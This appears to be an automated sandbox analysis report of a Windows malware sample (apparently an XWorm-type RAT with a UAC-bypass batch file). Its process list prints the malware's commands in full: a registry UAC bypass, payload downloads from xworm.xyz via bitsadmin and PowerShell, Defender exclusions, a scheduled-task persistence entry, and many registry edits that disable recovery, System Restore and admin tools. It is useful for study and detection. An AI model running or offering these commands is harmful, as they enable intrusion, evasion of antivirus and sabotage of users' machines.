| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \Registry\User\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\NotificationData | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"
C:\Windows\system32\certutil.exe
certutil -decodehex temp.hex "Uni.exe"
C:\Users\Admin\AppData\Local\Temp\Uni.exe
Uni.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
"C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
"C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reset survival.bat" "
C:\Windows\SysWOW64\ReAgentc.exe
reagentc /disable
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\sc.exe
sc config wercplsupport start=disabled
C:\Windows\SysWOW64\sc.exe
sc config WerSvc start=disabled
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
Files
memory/3876-0-0x00007FFB7DB83000-0x00007FFB7DB85000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euky0onc.3of.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3876-9-0x00000210DDB80000-0x00000210DDBA2000-memory.dmp
memory/3876-10-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
memory/3876-11-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
memory/3876-12-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
memory/3876-16-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
| MD5 | 011e90b162cf67f34f91d6d563859817 |
| SHA1 | 30ce18995be9545ae88189bc3ff5defbd2392d11 |
| SHA256 | 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613 |
| SHA512 | 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d |
C:\Users\Admin\AppData\Local\Temp\temp.hex
| MD5 | fad3aaf3015914e834a9d0313fcd371b |
| SHA1 | a4715a153a79263436819905b87b54acae4b2227 |
| SHA256 | 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690 |
| SHA512 | 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a |
C:\Users\Admin\AppData\Local\Temp\Uni.exe
| MD5 | 09e870076cfaa16f20be5050834ba8ff |
| SHA1 | 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840 |
| SHA256 | f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4 |
| SHA512 | d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643 |
memory/564-24-0x0000000000530000-0x0000000000540000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d405540758f0f5bdaab94f1a054cc67d |
| SHA1 | 07e307420a26d17c2dc1226af6e72018da4ae26c |
| SHA256 | 2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61 |
| SHA512 | 59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ac62bf271b94b583bcf13eef6b124fee |
| SHA1 | 7fc6c2f61155471eaaadb7da29579eb0958de3df |
| SHA256 | 8ab85c280555d6f378573edba932182d36a89f2bff7762dea01416480b2ac8f4 |
| SHA512 | 7ac0a424cce85734da99afd0019d85cc12c5b77cde32a6b51e1025bf7521c7be4332850d9f6ed6035c8de09c138687b5f8b8897230c5b06ab6c1bef640155ba7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5794c1baef4c234203656fbbc884eee4 |
| SHA1 | b41df301d53ebe67c5027ee2e7d9cea828790f05 |
| SHA256 | 7b700c984d5eec7c786dc348c669fc480f91f598fa193d1eabc398b200b2d818 |
| SHA512 | 805382583ccf14e6b29584d5a813705615095723485137ed6bc618acbed07b08fb043c1b925c98d7ecd4519515d622fa0122d4f23f7f3031117437cdc676579d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
| MD5 | 2841cd968c72817f9eef3a4bc2293d6e |
| SHA1 | 5b788259d501493a87f00deee64fa0943ab19e34 |
| SHA256 | e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95 |
| SHA512 | 82eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0 |
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
| MD5 | 1d62aa3d19462f3d5575fc54159911b4 |
| SHA1 | b37eab86c0075245fcc517a280f0705f6dffb852 |
| SHA256 | 6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36 |
| SHA512 | 78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df |
C:\Users\Admin\AppData\Local\Temp\reset survival.bat
| MD5 | ecde221cbc92ee55ae5b8c1a24e98f56 |
| SHA1 | ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee |
| SHA256 | b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb |
| SHA512 | 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493 |
memory/3212-98-0x00000000030E0000-0x0000000003116000-memory.dmp
memory/3212-99-0x0000000005DA0000-0x00000000063CA000-memory.dmp
memory/3212-101-0x0000000005B80000-0x0000000005BA2000-memory.dmp
memory/3212-106-0x0000000006440000-0x00000000064A6000-memory.dmp
memory/3212-105-0x0000000005CE0000-0x0000000005D46000-memory.dmp
memory/3212-115-0x00000000064C0000-0x0000000006817000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 050567a067ffea4eb40fe2eefebdc1ee |
| SHA1 | 6e1fb2c7a7976e0724c532449e97722787a00fec |
| SHA256 | 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e |
| SHA512 | 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259 |
memory/3212-118-0x0000000006920000-0x000000000693E000-memory.dmp
memory/3212-119-0x0000000006950000-0x000000000699C000-memory.dmp
memory/3212-120-0x0000000007900000-0x0000000007934000-memory.dmp
memory/3212-121-0x0000000075000000-0x000000007504C000-memory.dmp
memory/3212-130-0x0000000006EF0000-0x0000000006F0E000-memory.dmp
memory/3212-131-0x0000000007940000-0x00000000079E4000-memory.dmp
memory/3212-132-0x00000000082A0000-0x000000000891A000-memory.dmp
memory/3212-133-0x0000000007C60000-0x0000000007C7A000-memory.dmp
memory/3212-134-0x0000000007CF0000-0x0000000007CFA000-memory.dmp
memory/3212-135-0x0000000007EF0000-0x0000000007F86000-memory.dmp
memory/3212-136-0x0000000007E70000-0x0000000007E81000-memory.dmp
memory/3212-137-0x0000000007EB0000-0x0000000007EBE000-memory.dmp
memory/3212-138-0x0000000007EC0000-0x0000000007ED5000-memory.dmp
memory/3212-139-0x0000000007FB0000-0x0000000007FCA000-memory.dmp
memory/3212-140-0x0000000007FA0000-0x0000000007FA8000-memory.dmp